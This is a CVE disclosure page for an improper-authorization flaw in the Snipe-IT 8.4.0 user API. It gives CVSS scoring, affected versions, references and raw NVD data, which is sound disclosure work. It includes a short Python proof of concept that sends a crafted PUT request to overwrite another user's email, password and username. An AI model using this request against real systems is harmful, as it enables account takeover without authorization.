Security Vulnerability Report
中文
CVE-2026-38533 CVSS 6.5 MEDIUM

CVE-2026-38533

Published: 2026-04-14 16:16:44
Last Modified: 2026-05-01 15:23:59

Description

An improper authorization vulnerability in the /api/v1/users/{id} endpoint of Snipe-IT v8.4.0 allows authenticated attackers with the users.edit permission to modify sensitive authentication and account-state fields of other non-admin users via supplying a crafted PUT request.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:snipeitapp:snipe-it:8.4.0:*:*:*:*:*:*:* - VULNERABLE
Snipe-IT 8.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Configuration target_url = "http://target-snipe-it.com/api/v1/users/{target_user_id}" api_token = "YOUR_VALID_API_TOKEN" # User with users.edit permission headers = { "Authorization": f"Bearer {api_token}", "Content-Type": "application/json", "Accept": "application/json" } # Malicious payload to modify sensitive fields # Exploiting the improper authorization to change email/password payload = { "email": "[email protected]", "password": "NewPassword123!", "username": "hacked_account" } # Send the exploit request response = requests.put(target_url, json=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful! User data modified.") else: print(f"[-] Exploit failed. Status: {response.status_code}") print(response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38533", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:43.963", "lastModified": "2026-05-01T15:23:59.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper authorization vulnerability in the /api/v1/users/{id} endpoint of Snipe-IT v8.4.0 allows authenticated attackers with the users.edit permission to modify sensitive authentication and account-state fields of other non-admin users via supplying a crafted PUT request."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:snipeitapp:snipe-it:8.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "EC83DB38-C707-4975-A50D-CBEDEFF0309E"}]}]}], "references": [{"url": "https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38533", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Mitigation"]}, {"url": "https://snipeitapp.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2026-38533/poc.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}